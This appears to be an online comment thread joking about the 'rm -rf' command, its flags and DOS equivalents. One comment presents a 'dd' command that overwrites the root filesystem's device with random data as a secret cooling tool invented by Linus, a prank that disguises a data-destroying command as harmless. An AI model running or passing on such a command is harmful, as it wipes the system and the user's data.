I don't get it.

that's not an option for the french in the command heh

oh I get it now. it's Format c:*.*

It’s options within the remove (rm) commas to force (f) delete and recursively (r)

Command* not commas lol, damn autocorrect

haha yeah, i didn't recognise at first it because probably like most people i normally use -rf but order doesn't matter of course

it's not quite the same as format... i forget now if there is even an option in the DOS command "del" for doing recursive delete, i suspect there isn't, and you have to use some other commands as well, i mean, ok, there probably IS this option in windows shell definitely powershell

but honestly, microsoft spent so much money making their own shit instead of doing like the rest of the industry and copying from unix standard, and they made such a dance about posix compliance but it's never really happened, it's only because they bought github and made vscode that they finally are supporting actual unix standart

Nuked one of my nodes doing this, true story

Don't worry, had a backup

Actually all systems have a builtin tool to turn hard drives into fans, works all the time, it's crazy

sudo dd if=/dev/urandom of=$(mount | grep " / " | awk '{print $1}')

It's a secret tool that Linus coded on a hot summer Finnish day, I mean he had to, it was 15 degrees, he was sweating! Legend has it that he used the tool on 20 hard drives to lower his room's temperature to a nice and comfortable 5 degrees... The only problem was the noise, but he just put a blanket on it
